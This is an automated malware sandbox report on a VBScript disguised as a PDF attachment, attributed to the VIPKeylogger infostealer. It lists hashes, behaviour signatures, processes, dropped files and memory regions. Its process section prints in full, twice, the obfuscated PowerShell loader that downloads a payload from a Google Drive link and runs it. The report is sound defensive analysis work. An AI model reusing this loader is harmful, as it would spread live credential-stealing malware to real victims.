Overview

overview

10

Static

static

1

att1-24110...DF.vbs

windows7-x64

8

att1-24110...DF.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 15:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    att1-241104022450_PDF.vbs

  • Size

    28KB

  • MD5

    9d2f1b9d85e014524c2c596d60b0e4c7

  • SHA1

    9c4798635e685841ea77bf887cbb32bb200a0cdd

  • SHA256

    6819ede9fdd746e4b94b591ebd20904bbb0b065c2a20e3f606951147c04e77e5

  • SHA512

    e7cb5b13550925d4a4dee3e1fe6564f7e57f79a457921c46158515e242fa5dbacab75614cb1906ec594bc5fa5b8ef3b7da51f936abe52d6f040051e953a153ca

  • SSDEEP

    768:TODAJEvQefRV0/9QPrhPg691+xggNK5Is:8jvNZV0arV7H+xJNK5Is

Score
10/10
vipkeyloggercollectiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

    stealerkeyloggervipkeylogger
  • Vipkeylogger family
    vipkeylogger
  • Blocklisted process makes network request 11 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\att1-241104022450_PDF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#animando Actinotoxemia Gallstones Afholdsloge misdisposition Semioccasionally #>;$Altngle='Samordninger';<#Cynipidae Edvinds Utrsteliges Tridacna Befuldmgtigelsers Logaritmes Reobligation #>; function Guiders($Undgldelsens){If ($host.DebuggerEnabled) {$Alkide++;}$Amarevole=$Prelingually+$Undgldelsens.'Length' - $Alkide; for ( $Acidoses=5;$Acidoses -lt $Amarevole;$Acidoses+=6){$Careener=$Acidoses;$Germens+=$Undgldelsens[$Acidoses];}$Germens;}function Slanderousness($slalomkrslers){ . ($Mutineered) ($slalomkrslers);}$Unstaid=Guiders ' NeonMDi,jaoMarthzVestmiJu iolUfejll FjeraSmaas/ Hels ';$Bastionens=Guiders 'HjertT Iti.lJackssSonan1Espie2Munke ';$Sandbundens='Til,u[TosheN Phy ePrve,t Vert.Ind lS Bi.me OverR NsecvPre iiUkrnkcSkyliESpecipLune,OFolkei SkolN ewartAbecembettiaRaadsnFi.msATelefGEkspeEDys orEdeni] U.co:Glimr:Afb nsUdva,eBes,iC DiasuNoncor TotaiSalvetUnderYTaphapSvejerM.cadOSkrumt uncooOecopCMde ooB kkaLKeck =Octav$ laprBGestiaFlkhaSbremsTSedesiUncoqoStereNT,gelePsychnomlagsRe to ';$Unstaid+=Guiders ' Synk5Stalw.Slyng0 Pelt En in(DivinWAfstaihy ocnKviltdPrimno P.ysw KurssBi.te MonoNInsisT onpu Oppre1phren0isenk.Rudde0S rco;De,og Mil,iWSedimiStipunDerog6 arko4Subma;Glyce laasxIndle6Libel4Archc;Heste Nondir ErnrvChro.:.ente1Conco3 Lon,1Hyena.Udban0Reek )Medic MilieGDisameCrokicVinhsk pasmoEryth/Fibri2 red0O.spa1Joyho0 Pele0Plnen1Origi0Putne1Recol DagreF S rsiSolnerForele Ga.gf Menso,armox Uerh/Flere1Oriel3Funkt1Inboa.Murex0Br nk ';$stagiritic=Guiders 'TetraU El rSRatteeIn erRMalad-terpeA TendGSephiE Di nNRevenTSmadd ';$Unlustrously=Guiders 'PawschshingtAdmirt Queap Luncs W le: tag/Tuba./UnreqdUrinartilsyiKlamrvSolose Vaku.Tils gMillwo Vrdio SchogBedril MenueKagef.Spru,c MarioAntigmDeepw/En omuDumpec Sten?HumaneFr.stx KryppMot co OpinrHypert Tank= asudBlodpoBaaduw uthynlsegllBil roCyk.laB.affdOverc&PictuiSweltdSkyts=Uncat1MarryUUnsup_ RettrLkke aDisjuhKejs QA,ensbBramfK reggSRioti7Pattyv RaadDHypni7JailhQPersoq.ilkmcOdyss6SarkaWFljlsXIndus3 ove,gReconX.mbinnAlvinjStym,xGarboTP.etefCillaqDec.mR InstZinterb ouldp kab ';$Geophilidae238=Guiders 'Salpe>Promp ';$Mutineered=Guiders 'KvindIEndone Li sxLindi ';$Myrmecobine='Overtediousness';$Vocatives='\Staalstukknes.Adv';Slanderousness (Guiders 'stryk$NetstgTrlaslPromeOUforbb ,tyraG.ldbLSmaas:Antica R fln .dkmTbernyI Til.pgimbahRehallResawoPeroxgGopurI PinkS dangt Spali NondCH rry=Nemer$SnyltEove hn AnlbVUd ld:.ransa hogPPidgip EthadEpisaABridlTBlaweARalst+Dia o$S,nsaVHype OFimbucDyrk aBegreTAlamoIEnddav algbEFre.eSGumme ');Slanderousness (Guiders 'fragm$U ffigTeleuLDela oRenhaBPers AMagt L sop: PollbUninsLP oteU H lbSImpresTrikoE VolanUnenkEInstr=Eft,r$AutorUNoncrnHftenLelastuDermasAdmi,tBifleRBankfoSoaryu yrebSF,rreL,nstrYFrdse.Arbors ChilPafri,lNomneiLiriptOvera(Prve $Ca esGStripeM einOUdk kPRenumhPigheIA errLPetraISmockDservoAElec eFaerd2Semin3Nonin8Later)Med,l ');Slanderousness (Guiders $Sandbundens);$Unlustrously=$blussene[0];$Mediekommissionenens=(Guiders 'Fei n$Valetg,onesLDefolO ParcB risgADadail Tera:DomsaS Und JIrrecAJ rdsvSuperS aurie CoerNviske=CanciNLimacEKalorwAcc m- ArbiOY llobUd ytjLabideStodgc Y,geT Coe, SamsSInforY UnspSPreadTChaptEF uviMDrg,i.BrushNBetreESi ent Poly.FifleWsp aeEEd caBF avlC KharlKaotiiAbridEMleaonSum atHydro ');Slanderousness ($Mediekommissionenens);Slanderousness (Guiders 'unbuc$WalesSRigeljStoddaCentrvmusetsqua reA,omknKdham.SixinHS,lene Ompla Un cdStavbeTuskhrTillosAud t[Unifo$Er ans kkert inteaStorhgNascaiafs.rrUnconiVindetNonwoiForl cForti]Kibbl=Dendr$TrsniU Si,dnPrismstidsitCruoraFornui Gua.dEnt.r ');$Psychiater=Guiders ' Pejl$Fa etS rookjAcr,ma Lib vSs ansKnebse isconPozzy.Pe siDgauk oProcowStee nDoltclSkjorotra kaStedfdBundlFHoteli emoglStil.eR fry(Under$Fej.pU.eukmnPeerelDatabuMassesblgebtstandrBijo oFrembu SlgesKulkllMicroyFlint,Ramif$HydroNDiscooOrthotVarm eS.ppebRhinoo BagagPealesReco )Hdlci ';$Notebogs=$Antiphlogistic;Slanderousness (Guiders 'Minif$OpgavGT aralCuir oUns db Sn.eAGenr LSalpi:TampoDHandeO puneBCannoBBeflaE DigtlStraatKursueVa ilKOvertsScrufpflos,OSu ranGavtyeDeprerDe onIFluxiNDiscaG Kilo= titl( Okset UnatEindisSLuft tMetap-UslinPLimouaBelysTCoasth.ewre S.des$UnrhyN RekooBldgrtT kkeEC.ssebCo juOEn angGrundsStewa)Paper ');while (!$Dobbelteksponering) {Slanderousness (Guiders 'Vocti$SemifgApinol GrueoAt.olbmdep aSporal.kndi:Sor cGL mpeeInappnrituafGnavedkommus IodieRa,salBaand=Terma$ve.sitOpr sr T eauFingeeDecep ') ;Slanderousness $Psychiater;Slanderousness (Guiders 'SrinasD aleTGlauxaCountr awnt Skbn- Ind.sUdkl.LChokeeTwistE UninpSlims Snowb4Trog, ');Slanderousness (Guiders 'Hyper$ AraiGB.rtfLMeldsOAraisbfedteA .awaLOv rm:SaltidEr siOV korB.migrb indvEgrindLUndert StriEToninkSpirisSeksepMisgooUdblsnSammeEDroplRDiapnIBom rNca itg trlk=Ligeg(VuggetSne.le ThraSAlwinT Hjel-KashaP mrinAStipuTFo brHTradu Tuber$BundgN VeniO,ermot Ljere .atrBRetteOSali GFl.shsVandb)Clari ') ;Slanderousness (Guiders ' Genf$BibligCostaLS ropoOpd tBSkridADkstol Wind:PresbvSovebDMyggee SlagLHatchsRapsoe ilen=Plais$ Gr nGHornfL ArbeO StupB B tia PictLNagu : TarvBsirenlFindeoRebs MDoebesDwo.tT TerrEP.ultnPal,d+Kolon+Kont,%tonea$magerbPlastLBiznau RigssBr nkSSrge EKrusensuperEextr,.Arrakc.ackeoLektiUSkattNKonceTNonid ') ;$Unlustrously=$blussene[$Vdelse];}$Semipatriotic=285226;$Kompetenceomraades=31982;Slanderousness (Guiders 'Vo os$Ur.nbgGodv,LNeofao SeizbAnl,nAO.erhLRea a:NosolBTegntEO.eane SkabH inteiProgrvVedrre ,rit Byret=Mod,f Specg Di yeOnomaTTraff-Le tocSuk,eoD alen,impetBallyebristnDouriT Baty verm$ungskNPlakaO RentTHageseWelasB Oi,toR nebGUnco s Stre ');Slanderousness (Guiders 'Ontax$Fritig Oli lOktavoStinabPerleaP,edolOmlgg:JustiBBesvra ssinbScootiGud ar hiapuVildfs Spu sKursuaK use Udsen= .hth Oilom[DomesSDiatoyPuppes ChemtAtlaseFlakemanve .ParapCChairoA,cusn Da.kvKindbeLatinr HvidtNorth]Nital: oeli:BnkebF einsrMarkroLandsmProp,BMil vaRusposS ambeCasti6Is.re4TabelSVognstStignrkeratiNatannPi,stgMa ur( Asto$BinomBEnsheeDo.nceClarahS ottiPopulvUtrttePro,u) sogr ');Slanderousness (Guiders 'mamlu$P udigFourilP,adeoPrep B p asALuknil rund:ForsaNAlvasISmoggT.egioE D muNGlidec TurnY kunz Nerve=Energ Emul[Favi s ForfYAfsbnsFluidt Potsetet aME,sis.SociotFi,trEunridX eateT Kont.Ide te Hy rN UnaccMarioO,hotod NayaI achiNCy,noGFrikt]Sge m:Elfor:Ov.rgABulloSPriorCSpireIVa meiAfsvk.HebecG orpleFuldkTDoktosSwa,tTGilleR UdpniHippen Rea.gFo es( rnne$ Inj.BRhemiaLeverBPseu IMorgeRLa,rdUDecoss ootsS.claiaKend )Camio ');Slanderousness (Guiders ' Unro$ arbeGspionLDjvl,o LaagBUdfleamisbiLFlipp:Pref k utooiunsurmSaedvoOrthoN corvo CoheEOe,opRExhumnUdsuleRehob=Retab$FrergnD,lthIGangftFlam EFor en,odric AfpaYPens . HeksSS.etoUKly.eBMc orsOpflatD renR ortsiOdoseNTum.fGKlren( Krau$ AfhnSTosseeExtram ZirkiDile.PEperoa Ve.dtHypogRHuma.I Sta OS,emaTVi,keI Be,uC Bar ,Silab$DentaK ZinnOSpndimBehanpCestoeA.quitSpejdedobbeNTruttCfebriENdvenOBedcaMIndifR,psoaA Wep.aRadikdKoedceNdvens Vand)Fu,ts ');Slanderousness $Kimonoerne;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3952
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#animando Actinotoxemia Gallstones Afholdsloge misdisposition Semioccasionally #>;$Altngle='Samordninger';<#Cynipidae Edvinds Utrsteliges Tridacna Befuldmgtigelsers Logaritmes Reobligation #>; function Guiders($Undgldelsens){If ($host.DebuggerEnabled) {$Alkide++;}$Amarevole=$Prelingually+$Undgldelsens.'Length' - $Alkide; for ( $Acidoses=5;$Acidoses -lt $Amarevole;$Acidoses+=6){$Careener=$Acidoses;$Germens+=$Undgldelsens[$Acidoses];}$Germens;}function Slanderousness($slalomkrslers){ . ($Mutineered) ($slalomkrslers);}$Unstaid=Guiders ' NeonMDi,jaoMarthzVestmiJu iolUfejll FjeraSmaas/ Hels ';$Bastionens=Guiders 'HjertT Iti.lJackssSonan1Espie2Munke ';$Sandbundens='Til,u[TosheN Phy ePrve,t Vert.Ind lS Bi.me OverR NsecvPre iiUkrnkcSkyliESpecipLune,OFolkei SkolN ewartAbecembettiaRaadsnFi.msATelefGEkspeEDys orEdeni] U.co:Glimr:Afb nsUdva,eBes,iC DiasuNoncor TotaiSalvetUnderYTaphapSvejerM.cadOSkrumt uncooOecopCMde ooB kkaLKeck =Octav$ laprBGestiaFlkhaSbremsTSedesiUncoqoStereNT,gelePsychnomlagsRe to ';$Unstaid+=Guiders ' Synk5Stalw.Slyng0 Pelt En in(DivinWAfstaihy ocnKviltdPrimno P.ysw KurssBi.te MonoNInsisT onpu Oppre1phren0isenk.Rudde0S rco;De,og Mil,iWSedimiStipunDerog6 arko4Subma;Glyce laasxIndle6Libel4Archc;Heste Nondir ErnrvChro.:.ente1Conco3 Lon,1Hyena.Udban0Reek )Medic MilieGDisameCrokicVinhsk pasmoEryth/Fibri2 red0O.spa1Joyho0 Pele0Plnen1Origi0Putne1Recol DagreF S rsiSolnerForele Ga.gf Menso,armox Uerh/Flere1Oriel3Funkt1Inboa.Murex0Br nk ';$stagiritic=Guiders 'TetraU El rSRatteeIn erRMalad-terpeA TendGSephiE Di nNRevenTSmadd ';$Unlustrously=Guiders 'PawschshingtAdmirt Queap Luncs W le: tag/Tuba./UnreqdUrinartilsyiKlamrvSolose Vaku.Tils gMillwo Vrdio SchogBedril MenueKagef.Spru,c MarioAntigmDeepw/En omuDumpec Sten?HumaneFr.stx KryppMot co OpinrHypert Tank= asudBlodpoBaaduw uthynlsegllBil roCyk.laB.affdOverc&PictuiSweltdSkyts=Uncat1MarryUUnsup_ RettrLkke aDisjuhKejs QA,ensbBramfK reggSRioti7Pattyv RaadDHypni7JailhQPersoq.ilkmcOdyss6SarkaWFljlsXIndus3 ove,gReconX.mbinnAlvinjStym,xGarboTP.etefCillaqDec.mR InstZinterb ouldp kab ';$Geophilidae238=Guiders 'Salpe>Promp ';$Mutineered=Guiders 'KvindIEndone Li sxLindi ';$Myrmecobine='Overtediousness';$Vocatives='\Staalstukknes.Adv';Slanderousness (Guiders 'stryk$NetstgTrlaslPromeOUforbb ,tyraG.ldbLSmaas:Antica R fln .dkmTbernyI Til.pgimbahRehallResawoPeroxgGopurI PinkS dangt Spali NondCH rry=Nemer$SnyltEove hn AnlbVUd ld:.ransa hogPPidgip EthadEpisaABridlTBlaweARalst+Dia o$S,nsaVHype OFimbucDyrk aBegreTAlamoIEnddav algbEFre.eSGumme ');Slanderousness (Guiders 'fragm$U ffigTeleuLDela oRenhaBPers AMagt L sop: PollbUninsLP oteU H lbSImpresTrikoE VolanUnenkEInstr=Eft,r$AutorUNoncrnHftenLelastuDermasAdmi,tBifleRBankfoSoaryu yrebSF,rreL,nstrYFrdse.Arbors ChilPafri,lNomneiLiriptOvera(Prve $Ca esGStripeM einOUdk kPRenumhPigheIA errLPetraISmockDservoAElec eFaerd2Semin3Nonin8Later)Med,l ');Slanderousness (Guiders $Sandbundens);$Unlustrously=$blussene[0];$Mediekommissionenens=(Guiders 'Fei n$Valetg,onesLDefolO ParcB risgADadail Tera:DomsaS Und JIrrecAJ rdsvSuperS aurie CoerNviske=CanciNLimacEKalorwAcc m- ArbiOY llobUd ytjLabideStodgc Y,geT Coe, SamsSInforY UnspSPreadTChaptEF uviMDrg,i.BrushNBetreESi ent Poly.FifleWsp aeEEd caBF avlC KharlKaotiiAbridEMleaonSum atHydro ');Slanderousness ($Mediekommissionenens);Slanderousness (Guiders 'unbuc$WalesSRigeljStoddaCentrvmusetsqua reA,omknKdham.SixinHS,lene Ompla Un cdStavbeTuskhrTillosAud t[Unifo$Er ans kkert inteaStorhgNascaiafs.rrUnconiVindetNonwoiForl cForti]Kibbl=Dendr$TrsniU Si,dnPrismstidsitCruoraFornui Gua.dEnt.r ');$Psychiater=Guiders ' Pejl$Fa etS rookjAcr,ma Lib vSs ansKnebse isconPozzy.Pe siDgauk oProcowStee nDoltclSkjorotra kaStedfdBundlFHoteli emoglStil.eR fry(Under$Fej.pU.eukmnPeerelDatabuMassesblgebtstandrBijo oFrembu SlgesKulkllMicroyFlint,Ramif$HydroNDiscooOrthotVarm eS.ppebRhinoo BagagPealesReco )Hdlci ';$Notebogs=$Antiphlogistic;Slanderousness (Guiders 'Minif$OpgavGT aralCuir oUns db Sn.eAGenr LSalpi:TampoDHandeO puneBCannoBBeflaE DigtlStraatKursueVa ilKOvertsScrufpflos,OSu ranGavtyeDeprerDe onIFluxiNDiscaG Kilo= titl( Okset UnatEindisSLuft tMetap-UslinPLimouaBelysTCoasth.ewre S.des$UnrhyN RekooBldgrtT kkeEC.ssebCo juOEn angGrundsStewa)Paper ');while (!$Dobbelteksponering) {Slanderousness (Guiders 'Vocti$SemifgApinol GrueoAt.olbmdep aSporal.kndi:Sor cGL mpeeInappnrituafGnavedkommus IodieRa,salBaand=Terma$ve.sitOpr sr T eauFingeeDecep ') ;Slanderousness $Psychiater;Slanderousness (Guiders 'SrinasD aleTGlauxaCountr awnt Skbn- Ind.sUdkl.LChokeeTwistE UninpSlims Snowb4Trog, ');Slanderousness (Guiders 'Hyper$ AraiGB.rtfLMeldsOAraisbfedteA .awaLOv rm:SaltidEr siOV korB.migrb indvEgrindLUndert StriEToninkSpirisSeksepMisgooUdblsnSammeEDroplRDiapnIBom rNca itg trlk=Ligeg(VuggetSne.le ThraSAlwinT Hjel-KashaP mrinAStipuTFo brHTradu Tuber$BundgN VeniO,ermot Ljere .atrBRetteOSali GFl.shsVandb)Clari ') ;Slanderousness (Guiders ' Genf$BibligCostaLS ropoOpd tBSkridADkstol Wind:PresbvSovebDMyggee SlagLHatchsRapsoe ilen=Plais$ Gr nGHornfL ArbeO StupB B tia PictLNagu : TarvBsirenlFindeoRebs MDoebesDwo.tT TerrEP.ultnPal,d+Kolon+Kont,%tonea$magerbPlastLBiznau RigssBr nkSSrge EKrusensuperEextr,.Arrakc.ackeoLektiUSkattNKonceTNonid ') ;$Unlustrously=$blussene[$Vdelse];}$Semipatriotic=285226;$Kompetenceomraades=31982;Slanderousness (Guiders 'Vo os$Ur.nbgGodv,LNeofao SeizbAnl,nAO.erhLRea a:NosolBTegntEO.eane SkabH inteiProgrvVedrre ,rit Byret=Mod,f Specg Di yeOnomaTTraff-Le tocSuk,eoD alen,impetBallyebristnDouriT Baty verm$ungskNPlakaO RentTHageseWelasB Oi,toR nebGUnco s Stre ');Slanderousness (Guiders 'Ontax$Fritig Oli lOktavoStinabPerleaP,edolOmlgg:JustiBBesvra ssinbScootiGud ar hiapuVildfs Spu sKursuaK use Udsen= .hth Oilom[DomesSDiatoyPuppes ChemtAtlaseFlakemanve .ParapCChairoA,cusn Da.kvKindbeLatinr HvidtNorth]Nital: oeli:BnkebF einsrMarkroLandsmProp,BMil vaRusposS ambeCasti6Is.re4TabelSVognstStignrkeratiNatannPi,stgMa ur( Asto$BinomBEnsheeDo.nceClarahS ottiPopulvUtrttePro,u) sogr ');Slanderousness (Guiders 'mamlu$P udigFourilP,adeoPrep B p asALuknil rund:ForsaNAlvasISmoggT.egioE D muNGlidec TurnY kunz Nerve=Energ Emul[Favi s ForfYAfsbnsFluidt Potsetet aME,sis.SociotFi,trEunridX eateT Kont.Ide te Hy rN UnaccMarioO,hotod NayaI achiNCy,noGFrikt]Sge m:Elfor:Ov.rgABulloSPriorCSpireIVa meiAfsvk.HebecG orpleFuldkTDoktosSwa,tTGilleR UdpniHippen Rea.gFo es( rnne$ Inj.BRhemiaLeverBPseu IMorgeRLa,rdUDecoss ootsS.claiaKend )Camio ');Slanderousness (Guiders ' Unro$ arbeGspionLDjvl,o LaagBUdfleamisbiLFlipp:Pref k utooiunsurmSaedvoOrthoN corvo CoheEOe,opRExhumnUdsuleRehob=Retab$FrergnD,lthIGangftFlam EFor en,odric AfpaYPens . HeksSS.etoUKly.eBMc orsOpflatD renR ortsiOdoseNTum.fGKlren( Krau$ AfhnSTosseeExtram ZirkiDile.PEperoa Ve.dtHypogRHuma.I Sta OS,emaTVi,keI Be,uC Bar ,Silab$DentaK ZinnOSpndimBehanpCestoeA.quitSpejdedobbeNTruttCfebriENdvenOBedcaMIndifR,psoaA Wep.aRadikdKoedceNdvens Vand)Fu,ts ');Slanderousness $Kimonoerne;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3412
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:3948

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    806286a9ea8981d782ba5872780e6a4c

    SHA1

    99fe6f0c1098145a7b60fda68af7e10880f145da

    SHA256

    cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

    SHA512

    362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a40yihca.34w.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Staalstukknes.Adv
    Filesize

    413KB

    MD5

    3b03ce3b8aadd6190102aab58a22deb2

    SHA1

    bdf3f9906fc3ec7be31bb4224e25c65c845fb677

    SHA256

    ea5b83f57bdda9935d5268de550601c86971d7c145d1053653c78256b01575e0

    SHA512

    06663f288a5246e124cae1297a7c4a677fa242837c04ab13c92e9fdeb133a6f582fb82941dbb6028408ca9a1b5eac3eabff0d58cdfbd1dd2b8d2fd2ddb7bb558

    Download Submit

  • memory/3412-44-0x0000000007790000-0x0000000007E0A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3412-42-0x0000000005E00000-0x0000000005E1E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3412-50-0x00000000083C0000-0x000000000B643000-memory.dmp

    Filesize

    50.5MB

    Download

  • memory/3412-48-0x0000000007E10000-0x00000000083B4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3412-47-0x0000000006E00000-0x0000000006E22000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3412-26-0x00000000024F0000-0x0000000002526000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3412-45-0x00000000063A0000-0x00000000063BA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3412-43-0x0000000005E40000-0x0000000005E8C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3412-27-0x0000000005010000-0x0000000005638000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3412-28-0x0000000004F40000-0x0000000004F62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3412-29-0x0000000005730000-0x0000000005796000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3412-30-0x00000000057A0000-0x0000000005806000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3412-40-0x0000000005810000-0x0000000005B64000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3412-46-0x0000000006E60000-0x0000000006EF6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3948-66-0x0000000023230000-0x00000000232CC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3948-63-0x0000000000C70000-0x0000000001EC4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3948-71-0x00000000236E0000-0x00000000236EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3948-70-0x0000000023F00000-0x0000000023F92000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3948-68-0x0000000023600000-0x0000000023650000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3948-64-0x0000000000C70000-0x0000000001EC4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3948-67-0x0000000023770000-0x0000000023932000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/3948-65-0x0000000000C70000-0x0000000000CB8000-memory.dmp

    Filesize

    288KB

    Download

  • memory/3952-21-0x00007FFBAB840000-0x00007FFBAC301000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3952-19-0x00007FFBAB843000-0x00007FFBAB845000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3952-12-0x000001CC63210000-0x000001CC63232000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3952-16-0x00007FFBAB840000-0x00007FFBAC301000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3952-4-0x00007FFBAB843000-0x00007FFBAB845000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3952-20-0x00007FFBAB840000-0x00007FFBAC301000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3952-22-0x00007FFBAB840000-0x00007FFBAC301000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3952-25-0x00007FFBAB840000-0x00007FFBAC301000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3952-15-0x00007FFBAB840000-0x00007FFBAC301000-memory.dmp

    Filesize

    10.8MB

    Download